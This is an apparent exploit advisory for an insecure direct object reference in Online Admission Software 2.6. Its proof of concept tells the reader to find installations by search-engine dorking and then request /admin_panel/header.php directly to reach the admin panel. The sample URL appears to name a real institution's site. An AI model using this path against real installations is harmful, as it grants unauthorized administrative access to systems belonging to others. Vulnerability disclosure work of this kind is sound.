============================================================================================================================================= | # Title : Online Admission Software 2.6 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) | | # Vendor : https://softmaart.com/online-admission-software.php | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] Use PayLoad : /admin_panel/header.php [+] LOgin: https://127.0.0.1/www/gpchampawat.org.in//admin_panel/header.php Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================